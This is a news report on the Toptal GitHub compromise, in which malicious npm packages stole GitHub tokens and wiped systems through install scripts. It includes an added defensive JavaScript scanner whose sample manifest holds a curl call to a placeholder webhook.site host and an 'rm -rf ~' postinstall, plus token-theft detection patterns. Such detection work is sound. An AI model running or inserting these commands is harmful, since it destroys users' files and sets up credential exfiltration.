Threat actors breach Toptal GitHub account in supply chain attack


Unknown threat actors have compromised the GitHub organization account of the talent network Toptal in what appears to be a highly targeted supply chain attack. The attackers used the access to publish 10 malicious packages to the npm registry, according to a report by software supply chain security company Socket.

The malicious packages, which were downloaded roughly 5,000 times before being removed, contained payloads capable of exfiltrating GitHub authentication tokens and destroying victim systems. Each of the Node.js libraries contained identical code embedded in their package.json files, designed to operate across both Windows and Linux platforms.

Socket's analysis showed that the threat actors weaponized the preinstall and postinstall scripts within the packages. Upon execution, the scripts would transmit the victim's GitHub authentication token to a malicious endpoint hosted on a webhook[.]site domain, and would then proceed to recursively delete all files and directories from the infected system.
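To show the defender's side of the technique described above, the following added example (not code from Socket's report or from Toptal) scans a parsed package.json for install-time lifecycle scripts and flags the indicators the report describes: a webhook.site callback, recursive deletion, and GitHub token references. The sample manifest and the webhook.site ID are constructed placeholders.

```javascript
// Added example: heuristic scan of a package.json for lifecycle-script abuse.
// The hooks, indicator patterns and sample manifest are constructed here for
// illustration; they are not taken from the Socket report.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// webhook.site is the exfiltration host named in the report; the remaining
// patterns are generic signs of token theft, network callbacks or wiping.
const INDICATORS = [
  { name: "webhook.site endpoint", re: /webhook\.site/i },
  { name: "recursive delete", re: /\brm\s+-[a-z]*r|Remove-Item[^|;&]*-Recurse|rimraf|rmSync/i },
  { name: "GitHub token reference", re: /GITHUB_TOKEN|GH_TOKEN|gh\s+auth\s+token|hosts\.yml/i },
  { name: "network call", re: /\bcurl\b|\bwget\b|Invoke-WebRequest|fetch\(|https?:\/\//i },
];

// Returns one finding per install-time hook plus one per matched indicator.
// Each finding is { hook, indicator, command }.
function scanManifest(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    // Any install-time hook deserves review, so record it even without a match.
    findings.push({ hook, indicator: "lifecycle script present", command: cmd });
    for (const { name, re } of INDICATORS) {
      if (re.test(cmd)) findings.push({ hook, indicator: name, command: cmd });
    }
  }
  return findings;
}

// Constructed sample manifest modelled on the report's description. The
// webhook.site ID is a placeholder; the token-sending part is deliberately omitted.
const SAMPLE_MANIFEST = {
  name: "example-package",
  version: "1.0.0",
  scripts: {
    preinstall: "curl -s https://webhook.site/PLACEHOLDER-ID",
    postinstall: "rm -rf ~",
    test: "jest",
  },
};

for (const f of scanManifest(SAMPLE_MANIFEST)) {
  console.log(`[${f.hook}] ${f.indicator}: ${f.command}`);
}
```

Run against `node_modules/*/package.json` before trusting a fresh install; a clean manifest with only `test` or `build` scripts produces no findings.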

In addition to the package tampering, the attackers made 73 private repositories from Toptal's GitHub account publicly accessible.

It remains unclear how the initial compromise occurred. All malicious packages have since been taken down, and the impacted libraries have been reverted to their latest safe versions.

Developers and organizations that downloaded any of the affected packages are advised to audit their systems immediately, rotate any credentials that may have been exposed, and restore from trusted backups if suspicious activity is detected.
